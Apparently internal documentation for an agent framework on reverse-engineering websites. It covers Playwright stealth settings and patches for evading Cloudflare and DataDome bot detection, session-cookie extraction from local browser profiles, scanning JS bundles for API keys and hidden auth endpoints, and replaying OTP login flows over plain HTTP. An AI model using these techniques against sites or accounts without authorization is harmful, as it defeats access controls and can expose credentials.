Default Playwright/Chromium gets blocked by many sites (Goodreads returns 403, Cloudflare serves challenge pages). The fix is a set of anti-fingerprinting settings.
Minimum stealth settings
from playwright.sync_api import sync_playwright
with sync_playwright() as p:
browser = p.chromium.launch(
headless=True,
args=["--disable-blink-features=AutomationControlled"],
)
context = browser.new_context(
user_agent=(
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/131.0.0.0 Safari/537.36"
),
viewport={"width": 1440, "height": 900},
locale="en-US",
timezone_id="America/New_York",
)
page = context.new_page()
page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', { get: () => false });
""")
What each setting does
| Setting | Why |
|---|---|
--disable-blink-features=AutomationControlled | Removes the navigator.webdriver=true flag that Chromium sets in automation mode |
Custom user_agent | Default headless UA contains HeadlessChrome which is trivially blocked |
viewport | Default headless viewport is 800x600, which no real user has |
locale / timezone_id | Some bot detectors check for mismatches between locale and timezone |
navigator.webdriver = false | Belt-and-suspenders override in case the flag leaks through other paths |
Real example: Goodreads
Default Playwright against goodreads.com/book/show/4934 returns HTTP 403 with
one network request. With stealth settings, the page loads fully with 1400+ requests
including 4 AppSync GraphQL calls. See skills/goodreads/public_graph.py
discover_via_browser() for the implementation.
CDP Detection Signals — Why Playwright Gets Caught
Even with the stealth settings above, Playwright is still detectable at the Chrome DevTools Protocol (CDP) layer. These signals are invisible in DevTools and unrelated to headers, cookies, or user-agent strings. They matter most during reverse engineering sessions — if a site behaves differently under Playwright than in your real browser, CDP leaks are likely the cause.
Runtime.Enable leak
Playwright calls Runtime.Enable on every CDP session to receive execution
context events. Anti-bot systems (Cloudflare, DataDome) detect this with a few
lines of in-page JavaScript that only fire when Runtime.Enable is active.
This is the single most devastating detection vector — it works regardless of
all other stealth measures.
sourceURL leak
Playwright appends //# sourceURL=__playwright_evaluation_script__ to every
page.evaluate() call. Any page script can inspect error stack traces and see
these telltale URLs. This means your __NEXT_DATA__ extraction, DOM inspection,
or any other evaluate() call leaves a fingerprint.
Utility world name
Playwright creates an isolated world named __playwright_utility_world__ that
is visible in Chrome’s internal state and potentially to detection scripts.
What to do about it
These leaks are baked into Playwright’s source code — no launch flag or init script fixes them. Two options:
-
For most RE work: The stealth settings above (flags, UA, viewport, webdriver override) are enough. Most sites don’t check CDP-level signals. If a site seems to behave differently under Playwright, check for these leaks before adding complexity.
-
For strict sites (Cloudflare Bot Management, DataDome): Use
rebrowser-playwrightas a drop-in replacement. It patches Playwright’s source to eliminateRuntime.Enablecalls, randomize sourceURLs, and rename the utility world. Install:npm install rebrowser-playwrightand change your import.
This doesn’t affect production skills. Our architecture uses Playwright
only for discovery — production calls go through surf() / HTTPX, which has
zero CDP surface. The CDP leaks only matter during reverse engineering sessions
where you’re using the browser to investigate a protected site.
Cookie Domain Filtering — RFC 6265
When a cookie provider (brave-browser, firefox) extracts cookies for a domain like .uber.com, it returns cookies from ALL subdomains: .uber.com, .riders.uber.com, .auth.uber.com, .www.uber.com. If the skill’s base_url is https://riders.uber.com, sending cookies from .auth.uber.com is wrong — the server picks the wrong csid and redirects to login.
The engine implements RFC 6265 domain matching: when resolving cookies, it extracts the host from connection.base_url and passes it to the cookie provider. The provider filters cookies so only matching ones are returned:
host = "riders.uber.com"
.uber.com → riders.uber.com ends with .uber.com → KEEP (parent domain)
.riders.uber.com → riders.uber.com matches exactly → KEEP (exact match)
.auth.uber.com → riders.uber.com doesn't match → DROP (sibling)
.www.uber.com → riders.uber.com doesn't match → DROP (sibling)
This is automatic — skills don’t need to do anything. The filtering happens in the cookie provider (brave-browser/get-cookie.py, firefox/firefox.py) based on the host parameter the engine passes from connection.base_url.
When it matters: Only when a domain has cookies on multiple subdomains with the same cookie name. Most skills are unaffected — Amazon, Goodreads, Chase all have cookies on a single domain. Uber is the first case where it matters.
The old workaround: Before RFC 6265 filtering, the Uber skill had a _filter_cookies() function that deduplicated by cookie name (last occurrence wins). This has been removed — the provider handles it correctly now.
Cookie Resolution — http.cookies()
Skills can resolve cookies for any domain without knowing which browser provides them:
from agentos import http
# Resolve cookies — provider discovery is automatic
cookie_header = http.cookies(domain=".uber.com")
resp = http.post(url, cookies=cookie_header, **http.headers(accept="json"))
# Specific account (multiple people logged in on different browsers)
cookie_header = http.cookies(domain=".uber.com", account="uber@contini.co")
http.cookies() uses the same auth resolver as connection-based auth: it tries all installed cookie providers (brave-browser, firefox, etc.), picks the best one, and returns a cookie header string. No hardcoded provider names in skill code.
Playwright integration
capture_network accepts a cookie_domain param that resolves cookies automatically:
# One step — no manual cookie extraction needed
run(skill="playwright", tool="capture_network", params={
"url": "https://riders.uber.com/trips",
"cookie_domain": ".uber.com",
"pattern": "**graphql**",
})
This replaces the old 3-step flow (extract from provider → reformat → inject).
Debugging 400/403 Errors
| Symptom | Likely cause | Fix |
|---|---|---|
403 from CloudFront with a bot-detection HTML page | JA3/JA4 fingerprint blocked | Shouldn’t happen with wreq — if it does, check that the engine is running the wreq build |
400 from CloudFront, body is "Forbidden" or short string | WAF rule triggered (header order, ALPN) | Use waf="cf" + check mode= |
400, body looks like "404" | API Gateway can’t route the request — usually a missing tenant/auth header | Find and add the missing header via extra= |
403 for a same-origin API (e.g. claude.ai) | Missing Sec-Fetch-* headers | Use waf="cf" — sets Sec-Fetch-* automatically |
403 from headless Playwright | Default Chromium automation fingerprint | Add stealth settings (see Headless Browser Stealth above) |
429 with “Vercel Security Checkpoint” HTML | Vercel blocks HTTP/2 fingerprint | Use waf="vercel" (sets http2=False) |
| Works in browser, fails in Python regardless | Check for authorization that’s not a JWT | Look for short Authorization values in the bundle (namespace, env name, etc.) |
Using Playwright to capture exact headers
When you’re stuck, use Playwright to intercept the actual XHR and log all headers (including those added by axios interceptors that aren’t visible in DevTools):
from playwright.sync_api import sync_playwright
def capture_request_headers(url_pattern: str, trigger_url: str) -> dict:
"""Navigate to trigger_url and capture headers from the first request matching url_pattern."""
captured = {}
with sync_playwright() as p:
browser = p.chromium.launch()
page = browser.new_page()
page.on("request", lambda req: captured.update(req.headers)
if url_pattern in req.url else None)
page.goto(trigger_url)
page.wait_for_timeout(3000)
browser.close()
return captured
Skill File Layout
skills/<skill-name>/
readme.md <- agentOS skill descriptor (operations, adapters, etc.)
requirements.md <- reverse engineering notes, API docs, findings log
<skill>.py <- Python module with all API functions
icon.svg <- skill icon
Keep requirements.md as a living document — update it every time you discover
a new endpoint, figure out a new header, or resolve a mystery.
Real-World Examples in This Repo
| Skill | Service | Transport config | Key learnings |
|---|---|---|---|
skills/amazon/ | Amazon (Lightsaber) | waf="cf", mode="navigate", accept="html" | Full device hints required, skip_cookies= for Siege encryption, session warming. Chrome TLS fingerprint (wreq) required for orders page — Amazon’s WAF uses JA4 + OpenID max_auth_age=0 per-feature auth gates. |
skills/austin-boulder-project/ | Tilefive / approach.app | accept="json" + auth header | CloudFront, Authorization = namespace string |
skills/claude/ | claude.ai (Cloudflare) | waf="cf", accept="json", http2=False override | Custom Sec-CH-UA (Brave v146), Cloudflare bypass needs Sec-Fetch-* |
skills/exa/ | dashboard.exa.ai (Vercel) | waf="vercel", accept="json" | Vercel checkpoint is purely TLS — cookies and headers irrelevant |
skills/goodreads/ | Goodreads (CloudFront) | waf="cf", accept="html" | Public GraphQL via CloudFront, headless Playwright needs stealth settings |
skills/uber/ | Uber (CloudFront) | accept="json" + custom headers | RFC 6265 cookie domain filtering — first skill where sibling subdomain cookies caused bugs |
Reverse Engineering — Discovery & Data Extraction
Once you can talk to the server (see 1-transport), how do you find and extract structured data?
This is Layer 2 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery (this file) — finding structured data in pages and bundles
- Layer 3: Auth & Runtime — 3-auth
- Layer 4: Content — 4-content — HTML scraping when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
Tool: browse capture (bin/browse-capture.py) is the primary discovery tool. It connects to your real browser (Brave/Chrome) via CDP and captures all network traffic with full headers and response bodies. For DOM inspection, use the browser’s own DevTools. See the overview for the full toolkit.
Why not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint. Sites like Amazon and Cloudflare-protected services reject it. CDP to a real browser produces authentic fingerprints and uses existing sessions. See Transport.
Next.js + Apollo Cache Extraction
Many modern sites (Goodreads, Airbnb, etc.) use Next.js with Apollo Client. These pages ship a full serialized Apollo cache in the HTML — structured entity data that you can parse without scraping visible HTML.
Where to find it
<script id="__NEXT_DATA__" type="application/json">{ ... }</script>
Inside that JSON:
__NEXT_DATA__
.props.pageProps
.props.pageProps.apolloState <-- the gold
.props.pageProps.apolloState.ROOT_QUERY
How Apollo normalized cache works
Apollo stores GraphQL results as a flat dictionary keyed by entity type and ID.
Related entities are stored as {"__ref": "Book:kca://book/..."} pointers.
import json, re
def extract_next_data(html: str) -> dict:
match = re.search(
r'<script id="__NEXT_DATA__" type="application/json">(.*?)</script>',
html, re.S,
)
if not match:
raise RuntimeError("No __NEXT_DATA__ found")
return json.loads(match.group(1))
def deref(apollo: dict, value):
"""Resolve Apollo __ref pointers to their actual objects."""
if isinstance(value, dict) and "__ref" in value:
return apollo.get(value["__ref"])
return value
Extraction pattern
next_data = extract_next_data(html)
apollo = next_data["props"]["pageProps"]["apolloState"]
root_query = apollo["ROOT_QUERY"]
# Find the entity by its query key
book_ref = root_query['getBookByLegacyId({"legacyId":"4934"})']
book = apollo[book_ref["__ref"]]
# Dereference related entities
work = deref(apollo, book.get("work"))
primary_author = deref(apollo, book.get("primaryContributorEdge", {}).get("node"))
What you typically find in the Apollo cache
| Entity type | Common fields |
|---|---|
| Books | title, description, imageUrl, webUrl, legacyId, details (isbn, pages, publisher) |
| Contributors | name, legacyId, webUrl, profileImageUrl |
| Works | stats (averageRating, ratingsCount), details (originalTitle, publicationTime) |
| Social signals | shelf counts (CURRENTLY_READING, TO_READ) |
| Genres | name, webUrl |
| Series | title, webUrl |
The Apollo cache often contains more data than the visible page renders. Always
dump and inspect apolloState before assuming you need to make additional API calls.
Real example: Goodreads
See skills/goodreads/public_graph.py functions load_book_page() and
map_book_payload() for a complete implementation that extracts 25+ fields from
the Apollo cache without any GraphQL calls.
JS Bundle Scanning
SPAs embed everything in their JavaScript bundles — config values, API keys, custom endpoints, and auth flow logic. Scanning bundles is one of the highest- value reverse engineering techniques. It works without login, reveals hidden endpoints that network capture misses, and exposes the exact contracts the frontend uses.
Two levels of bundle scanning
Level 1: Config extraction — find API keys, endpoints, tenant IDs. Standard search for known patterns.
Level 2: Endpoint and flow discovery — find custom API endpoints that
aren’t in the standard framework (e.g. /api/verify-otp), understand what
parameters they accept, and how the frontend processes the response. This
is how you crack custom auth flows.
General pattern
import re, httpx
def scan_bundles(page_url: str, search_terms: list[str]) -> dict:
"""Fetch a page, extract all JS bundle URLs, scan each for search terms."""
with httpx.Client(http2=False, follow_redirects=True, timeout=30) as client:
html = client.get(page_url).text
# Extract all JS chunk URLs (Next.js / Turbopack pattern)
js_urls = list(set(re.findall(
r'["\'](/_next/static/[^"\' >]+\.js[^"\' >]*)', html
)))
results = {}
for url in js_urls:
js = client.get(f"{page_url.split('//')[0]}//{page_url.split('//')[1].split('/')[0]}{url}").text
for term in search_terms:
if term.lower() in js.lower():
# Extract context around the match
idx = js.lower().find(term.lower())
context = js[max(0, idx-100):idx+200]
results.setdefault(term, []).append({
"chunk": url[-40:],
"size": len(js),
"context": context,
})
return results
Config patterns to search for
| What | Search terms |
|---|---|
| API keys | apiKey, api_key, X-Api-Key, widgetsApiKey |
| GraphQL endpoints | appsync-api, graphql |
| Tenant / namespace | host.split, subdomain |
| Cognito credentials | userPoolId, userPoolClientId |
| Auth endpoints | AuthFlow, InitiateAuth, cognito-idp |
Custom endpoint patterns to search for
| What | Search terms |
|---|---|
| Custom auth flows | verify-otp, verify-code, verify-token, confirm-code |
| Hidden API routes | fetch(, /api/ |
| Token construction | callback/email, hashedOtp, rawOtp, token= |
| Form submission handlers | submit, handleSubmit, onSubmit |
How we cracked Exa’s custom OTP flow
Exa’s login page uses a custom 6-digit OTP system built on top of NextAuth.
The standard NextAuth callback failed with error=Verification. Scanning
the JS bundles revealed the actual flow:
# Search terms that found the hidden endpoint
results = scan_bundles("https://auth.exa.ai", ["verify-otp", "verify-code", "callback/email"])
In a 573KB chunk, this surfaced:
fetch("/api/verify-otp", {method: "POST", headers: {"Content-Type": "application/json"},
body: JSON.stringify({email: e.toLowerCase(), otp: r})})
// → response: {email, hashedOtp, rawOtp}
// → constructs: token = hashedOtp + ":" + rawOtp
// → redirects to: /api/auth/callback/email?token=...&email=...
This revealed the entire auth flow — custom endpoint, request/response shape, and token construction — all from static JS analysis.
Multi-environment configs
Many sites ship all environment configs in the same bundle. Goodreads ships four AppSync configurations with labeled environments:
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Dev"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Beta"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Preprod"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Prod"}
Pick the right one by looking for identifiers like shortName, showAds: true,
publishWebVitalMetrics: true, or simply taking the last entry (Prod is typically
last in webpack build output).
The “Authorization is the namespace” pattern
Some APIs use the Authorization header not for a JWT but for a tenant namespace
extracted from the subdomain at runtime:
Jl = () => host.split(".")[0] // -> "boulderingproject"
headers: { Authorization: Jl(), "X-Api-Key": widgetsApiKey }
If you see Authorization values that seem too short to be JWTs, look for the
function that generates them near the axios/fetch client factory in the bundle.
Real examples
- Goodreads:
skills/goodreads/public_graph.pydiscover_from_bundle()— extracts Prod AppSync config from_appchunk - Austin Boulder Project:
skills/austin-boulder-project/abp.py— API key and namespace from Tilefive bundle
Navigation API Interception
When JS bundle scanning reveals what endpoint gets called but not what happens with the result (e.g. a client-side token construction), you need to see the actual values the browser produces. The Navigation API interceptor is the key technique.
The problem
Client-side JS often does: fetch → process response → set window.location.href.
Once the navigation fires, the page is gone and you can’t inspect the URL. Network
capture only catches the fetch, not the outbound navigation. And the processing
logic is buried in minified closures you can’t easily call.
The solution
Modern Chrome exposes the Navigation API.
You can intercept navigation attempts, capture the destination URL, and prevent
the actual navigation — all with a single evaluate call:
evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }
Then trigger the action (click a button, submit a form), and read the captured URL:
click { selector: "button#submit" }
evaluate { script: "window.__intercepted_nav_url" }
The URL contains whatever the client-side JS constructed — tokens, hashes, callback parameters — fully assembled and ready to replay with HTTPX.
When to use this
| Situation | Technique |
|---|---|
Button click makes a fetch() call | Fetch interceptor (see 3-auth) |
| Button click causes a page navigation | Navigation API interceptor |
| Form does a native POST (page reloads) | Inspect the <form> action + inputs |
| JS constructs a URL and redirects | Navigation API interceptor |
Real example: Exa OTP verification
The Exa auth page’s “VERIFY CODE” button calls /api/verify-otp, gets back
{hashedOtp, rawOtp}, then does window.location.href = callback_url_with_token.
The Navigation API interceptor captured the full callback URL, revealing the
token format is {bcrypt_hash}:{raw_code}.
This technique turned a “Playwright required” flow into a fully HTTPX-replayable one. See NextAuth OTP flow.
Combining with fetch interception
For complete visibility, install both interceptors before triggering an action:
// Capture all fetch calls AND navigations
window.__cap = { fetches: [], navigations: [] };
// Fetch interceptor
const origFetch = window.fetch;
window.fetch = async (...args) => {
const r = await origFetch(...args);
const c = r.clone();
window.__cap.fetches.push({
url: typeof args[0] === 'string' ? args[0] : args[0]?.url,
status: r.status,
body: (await c.text()).substring(0, 3000),
});
return r;
};
// Navigation interceptor
navigation.addEventListener('navigate', (e) => {
window.__cap.navigations.push(e.destination.url);
e.preventDefault();
});
Read everything after: evaluate { script: "JSON.stringify(window.__cap)" }
Read the Source
When bundle scanning and interception give you the what but not the why, go read the library’s source code. This is especially valuable for well-known frameworks (NextAuth, Supabase, Clerk, Auth0) where the source is on GitHub.
Why this matters
Minified bundle code tells you what the client does. The library source tells you what the server expects. These are two halves of the same flow.
Example: NextAuth email callback
Bundle scanning revealed Exa calls /api/auth/callback/email?token=.... But
what does the server do with that token? Reading the
NextAuth callback source
revealed the critical line:
token: await createHash(`${paramToken}${secret}`)
The server SHA-256 hashes token + NEXTAUTH_SECRET and compares with the
database. This told us the token format must be stable and deterministic — it
can’t be a random value. Combined with the Navigation API interception that
showed token = hashedOtp:rawOtp, we had the complete picture.
When to read the source
| Signal | Action |
|---|---|
| Standard framework (NextAuth, Supabase, etc.) | Read the auth callback handler source |
Custom error messages (e.g. error=Verification) | Search the library source for that error string |
| Token/hash format is unclear | Read the token verification logic |
| Framework does something “impossible” | The source always reveals how |
Where to find it
NextAuth: github.com/nextauthjs/next-auth/tree/main/packages/core/src
Supabase: github.com/supabase/auth
Clerk: github.com/clerk/javascript
Auth0: github.com/auth0/nextjs-auth0
Search the repo for the endpoint path (e.g. callback/email) or error message
(e.g. Verification) to find the relevant handler quickly.
GraphQL Schema Discovery via JS Bundles
Production GraphQL endpoints almost never allow introspection queries. But the frontend JS bundles contain every query and mutation the app uses.
Technique: scan all JS chunks for operation names
import re
def discover_graphql_operations(html: str, base_url: str) -> set[str]:
"""Find all GraphQL operation names from the frontend JS bundles."""
chunks = re.findall(r'(/_next/static/chunks/[a-zA-Z0-9/_%-]+\.js)', html)
operations = set()
for chunk in chunks:
js = fetch(f"{base_url}{chunk}")
# Find query/mutation declarations
for m in re.finditer(r'(?:query|mutation)\s+([A-Za-z_]\w*)\s*[\(\{]', js):
operations.add(m.group(1))
return operations
What this finds
On Goodreads, scanning 18 JS chunks revealed 38 operations:
Queries (public reads): getReviews, getSimilarBooks, getSearchSuggestions,
getWorksByContributor, getWorksForSeries, getComments, getBookListsOfBook,
getSocialSignals, getWorkCommunityRatings, getWorkCommunitySignals, …
Queries (auth required): getUser, getViewer, getEditions,
getSocialReviews, getWorkSocialReviews, getWorkSocialShelvings, …
Mutations: RateBook, ShelveBook, UnshelveBook, TagBook, Like,
Unlike, CreateComment, DeleteComment
Extracting full query strings
Once you know the operation name, extract the full query with its variable shape:
def extract_query(js: str, operation_name: str) -> str | None:
idx = js.find(f"query {operation_name}")
if idx == -1:
return None
snippet = js[idx:idx + 3000]
depth = 0
for i, c in enumerate(snippet):
if c == "{": depth += 1
elif c == "}":
depth -= 1
if depth == 0:
return snippet[:i + 1].replace("\\n", "\n")
return None
This gives you copy-pasteable GraphQL documents you can replay directly via HTTP POST.
Real example: Goodreads
See skills/goodreads/public_graph.py for the full set of proven GraphQL queries
including getReviews, getSimilarBooks, getSearchSuggestions,
getWorksForSeries, and getWorksByContributor.
Public vs Auth Boundary Mapping
After discovering operations, you need to determine which ones work anonymously (with just the public API key) and which require user session auth.
Technique: probe each operation and classify the error
Send each discovered operation to the public endpoint and classify the response:
| Response | Meaning |
|---|---|
200 with data | Public, works anonymously |
200 with errors: ["Not Authorized to access X on type Y"] | Partially public — the operation works but specific fields are viewer-scoped. Remove the blocked field and retry. |
200 with errors: ["MappingTemplate" / VTL error] | Requires auth — the AppSync resolver needs session context to even start |
403 or 401 | Requires auth at the transport level |
AppSync VTL errors as a signal
AWS AppSync uses Velocity Template Language (VTL) resolvers. When a public request hits an auth-gated resolver, you get a distinctive error:
{
"errorType": "MappingTemplate",
"message": "Error invoking method 'get(java.lang.Integer)' in [Ljava.lang.String; at velocity[line 20, column 55]"
}
This means: “the resolver tried to read user context from the auth token and failed.” It reliably indicates the operation needs authentication.
Field-level authorization
GraphQL auth on AppSync is often field-level, not operation-level. A getReviews
query might work but including viewerHasLiked returns:
{ "message": "Not Authorized to access viewerHasLiked on type Review" }
The fix: remove the viewer-scoped field from your query. The rest works fine publicly.
Goodreads boundary scorecard
| Operation | Public? | Notes |
|---|---|---|
getSearchSuggestions | Yes | Book search by title/author |
getReviews | Yes | Except viewerHasLiked and viewerRelationshipStatus |
getSimilarBooks | Yes | |
getWorksForSeries | Yes | Series book listings |
getWorksByContributor | Yes | Needs internal contributor ID (not legacy author ID) |
getUser | No | VTL error — needs session |
getEditions | No | VTL error — needs session |
getViewer | No | Viewer-only by definition |
getWorkSocialShelvings | Partial | May need session for full data |
Heterogeneous Page Stacks
Large sites migrating to modern frontends have mixed page types. You need to identify which pages use which stack and adjust your extraction strategy.
How to identify the stack
| Signal | Stack |
|---|---|
<script id="__NEXT_DATA__"> in HTML | Next.js (server-rendered, may have Apollo cache) |
| GraphQL/AppSync XHR traffic after page load | Modern frontend with GraphQL backend |
No __NEXT_DATA__, classic <div> structure, <meta> tags | Legacy server-rendered HTML |
window.__INITIAL_STATE__ or similar | React SPA with custom state hydration |
Goodreads example
| Page type | Stack | Extraction strategy |
|---|---|---|
Book pages (/book/show/) | Next.js + Apollo + AppSync | __NEXT_DATA__ for main data, GraphQL for reviews/similar |
Author pages (/author/show/) | Legacy HTML | Regex scraping |
Profile pages (/user/show/) | Legacy HTML | Regex scraping |
Search pages (/search) | Legacy HTML | Regex scraping |
Strategy: use structured extraction where available, fall back to HTML only where the site hasn’t migrated yet. As the site migrates pages, move your extractors to match.
Legacy HTML Scraping
When a page has no structured data surface, regex scraping is the fallback.
Principles
- Prefer specific anchors (IDs, class names,
itempropattributes) over positional matching - Use
re.S(dotall) for multi-line HTML patterns - Extract sections first, then parse within the section to reduce false matches
- Always strip and unescape HTML entities
Section extraction pattern
def section_between(html: str, start_marker: str, end_marker: str) -> str:
start = html.find(start_marker)
if start == -1:
return ""
end = html.find(end_marker, start)
return html[start:end] if end != -1 else html[start:]
When to stop scraping
If you find yourself writing regex patterns longer than 3 lines, consider:
- Is there a
__NEXT_DATA__payload you missed? - Does the page make XHR calls you could replay directly?
- Can you use a headless browser to get the rendered DOM instead?
HTML scraping should be the strategy of last resort, not the first attempt.
Real-World Examples in This Repo
| Skill | Discovery technique | Reference |
|---|---|---|
skills/exa/ | JS bundle scanning for custom /api/verify-otp endpoint + Navigation API interception for token format + reading NextAuth source for server-side verification logic | exa.py, nextauth.md |
skills/goodreads/ | Next.js Apollo cache + AppSync GraphQL + JS bundle scanning | public_graph.py |
skills/austin-boulder-project/ | JS bundle config extraction (API key + namespace) | abp.py |
skills/claude/ | Session cookie capture via Playwright | claude-login.py |
Reverse Engineering — Auth & Credentials
How to log into things, get API keys, and store credentials — for any web service.
This is Layer 3 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery — 2-discovery
- Layer 3: Auth & Credentials (this file)
- nextauth.md — NextAuth.js / Auth.js deep dive
- workos.md — WorkOS auth pattern
- Layer 4: Content — 4-content
- Layer 5: Social Networks — 5-social
- Layer 6: Desktop Apps — 6-desktop-apps
How web auth works
Every web login — from a 2005 PHP app to a 2026 Next.js SPA — does the same three things:
- You prove who you are (type a password, click a link, enter a code)
- The server gives you a cookie (session token, JWT, whatever)
- You send that cookie with every request
That’s it. The mechanism varies — form POSTs, fetch calls, OAuth redirects — but the end result is always a cookie in your browser.
The two submission patterns
When you click “Submit” on a login form, one of two things happens:
Form POST (the classic). The browser sends an HTML form POST, the server responds with a redirect (302), and the browser follows it. Cookies get set along the way. This is the oldest pattern on the web and still used everywhere, including modern frameworks like NextAuth.
Browser: POST /login { email, password }
Server: 302 → /dashboard (Set-Cookie: session=abc123)
Browser: GET /dashboard (Cookie: session=abc123)
Fetch/XHR (the SPA way). JavaScript makes an async request, the page stays loaded, and the response is handled in JS. The page might update without a full navigation.
JS: fetch('/api/login', { method: 'POST', body: { email, password } })
Server: 200 { token: "abc123" }
JS: stores token, updates UI
Both are straightforward. When reverse engineering, you just need to figure out which one a site uses, then replay it.
Cookies
A cookie is a name-value pair the server sends with Set-Cookie and the
browser sends back with every request. The attributes control where and how:
| Attribute | What it means | HTTP client impact |
|---|---|---|
HttpOnly | JS can’t read it | Doesn’t affect agentos.http (only matters in browsers) |
Secure | HTTPS only | Use https:// URLs |
SameSite=Lax | Sent on navigations, not cross-site POSTs | agentos.http sends it normally |
Domain=.example.com | Works on all subdomains | Important when auth and dashboard are on different subdomains. The engine uses RFC 6265 domain matching to filter cookies by host from connection.base_url |
| Expiry | Session (until browser close) or persistent (date) | agentos.http doesn’t care — just send the cookie |
Cross-domain cookies: When auth lives at auth.exa.ai and the dashboard
at dashboard.exa.ai, the session cookie is scoped to .exa.ai so both
subdomains can use it. When extracting cookies, always check the domain —
.exa.ai works everywhere, auth.exa.ai only works on auth.
CSRF tokens
Sites protect against forged requests by requiring a CSRF token — a secret value the server generates and the client must include in form submissions.
The pattern is always the same:
- Fetch the token (from an endpoint, a meta tag, a hidden form field, or a cookie)
- Include it in your POST (as a form field, header, or both)
csrf = client.get("/api/auth/csrf").json()["csrfToken"]
client.post("/api/auth/signin/email", data={"email": email, "csrfToken": csrf})
The token and cookie must come from the same request. If you fetch the token with one HTTPX client and try to use it with another, the server will reject it because the CSRF cookie doesn’t match.
Where to find CSRF tokens during discovery:
# API endpoint (NextAuth)
evaluate { script: "fetch('/api/auth/csrf').then(r=>r.json()).then(d=>JSON.stringify(d))" }
# Meta tag
evaluate { script: "document.querySelector('meta[name=csrf-token]')?.content" }
# Hidden form fields
evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('input[type=hidden]')).map(i => ({name: i.name, value: i.value.substring(0,20)+'...'})))" }
The credential bootstrap
This is the end-to-end flow for getting credentials from a web dashboard. Every dashboard skill follows these five steps.
1. Navigate to the dashboard
Go to the dashboard URL (not the auth URL directly). The dashboard redirects to auth with the right callback URL.
get_webpage { url: "https://dashboard.example.com", wait_until: "domcontentloaded" }
# → redirects to https://auth.example.com/?callbackUrl=https://dashboard.example.com/
If it lands on a Cloudflare challenge page, that’s fine — the Playwright
browser solves it automatically and you get a cf_clearance cookie.
2. Figure out how to log in
Check what login methods are available:
evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(Object.keys(d)))" }
Inspect the form:
inspect { selector: "form" }
This tells you:
- Email + code → usually fully replayable with
agentos.http(see below) - Email + password → replay entirely with
agentos.http - Google/GitHub OAuth → Playwright for the consent screen, then cookies
- SSO (WorkOS, Okta) → see vendor guides
3. Complete the login
Try agentos.http first. Many email+code flows that appear browser-only are
actually fully replayable. The key technique is scanning the JS bundles for custom
verification endpoints (e.g. /api/verify-otp) and using the Navigation API
interceptor to discover token formats. See
Discovery: JS Bundle Scanning and
Discovery: Navigation API Interception.
from agentos import http
# Example: Exa email+code login — no browser needed
# 1. Trigger code email
with http.client() as client:
csrf_token = client.get(f"{AUTH_BASE}/api/auth/csrf").json()["csrfToken"]
client.post(f"{AUTH_BASE}/api/auth/signin/email", data={"email": email, "csrfToken": csrf_token, ...})
# 2. Agent reads code from email (Gmail, etc.)
# 3. Verify code via custom endpoint
resp = client.post(f"{AUTH_BASE}/api/verify-otp", json={"email": email, "otp": code})
data = resp.json() # {hashedOtp, rawOtp}
token = f"{data['hashedOtp']}:{data['rawOtp']}"
# 4. Hit the standard callback with the constructed token
client.get(f"{AUTH_BASE}/api/auth/callback/email?token={token}&email={email}&callbackUrl=...")
# → session cookie is now set on the client
Fall back to Playwright only for flows that genuinely require a browser
(Google OAuth consent screens, CAPTCHAs, or complex multi-step redirects).
Use type (not fill) for input fields on React forms.
If the login involves a verification code from email, the agent checks email between steps.
4. Grab the cookies
cookies { domain: ".example.com" }
You want the session cookie (usually next-auth.session-token, session,
auth_token, etc.) and optionally cf_clearance for Cloudflare.
Validate it works:
from agentos import http
with http.client(cookies={"next-auth.session-token": token}) as client:
session = client.get("https://dashboard.example.com/api/auth/session").json()
assert session.get("user"), "Session invalid"
5. Hit the dashboard APIs
Navigate to the API keys page and capture what the frontend calls:
capture_network { url: "https://dashboard.example.com/api-keys", pattern: "**/api/**", wait: 5000 }
This typically reveals endpoints for:
- Listing API keys
- Team/org info (rate limits, billing, usage)
- User profile
Always read the full API response. Dashboards mask values in the UI
(showing 9d2e4b••••••) but the API often returns them in full. Exa’s
/api/get-api-keys returns the complete API key as the id field — the UI
masking is purely client-side.
6. Store credentials
Return them via __secrets__ so the engine stores them securely:
return {
"__secrets__": [{
"issuer": "api.example.com",
"identifier": email,
"item_type": "api_key",
"label": "Example API Key",
"source": "example-skill",
"value": {"key": api_key},
"metadata": {
"masked": {"key": api_key[:6] + "••••••••"},
"dashboard_url": "https://dashboard.example.com/api-keys",
},
}],
"__result__": {"status": "authenticated", "identifier": email},
}
The engine writes to the credential store, creates an account entity on the
graph, and strips __secrets__ before the response reaches the agent.
Observing network traffic
Three tools, each for a different situation.
capture_network — what the page calls on load
Navigate to a URL and record all fetch/XHR traffic for a few seconds.
capture_network { url: "https://dashboard.exa.ai/api-keys", pattern: "**/api/**", wait: 5000 }
Use this to discover dashboard APIs, auth endpoints, and data shapes. Good patterns to filter with:
"**/api/**" REST APIs
"**graphql**" GraphQL endpoints
"**appsync-api**" AWS AppSync
Fetch interceptor — what a button click triggers
When you need to see what happens after a user interaction (like clicking “Create Key”), inject this before clicking:
evaluate { script: "window.__cap = []; const orig = window.fetch; window.fetch = async (...a) => { const req = { url: typeof a[0]==='string' ? a[0] : a[0]?.url, method: a[1]?.method||'GET' }; const r = await orig(...a); const c = r.clone(); req.status = r.status; req.body = (await c.text()).substring(0,3000); window.__cap.push(req); return r; }; 'ok'" }
click { selector: "button#create-key" }
evaluate { script: "JSON.stringify(window.__cap)" }
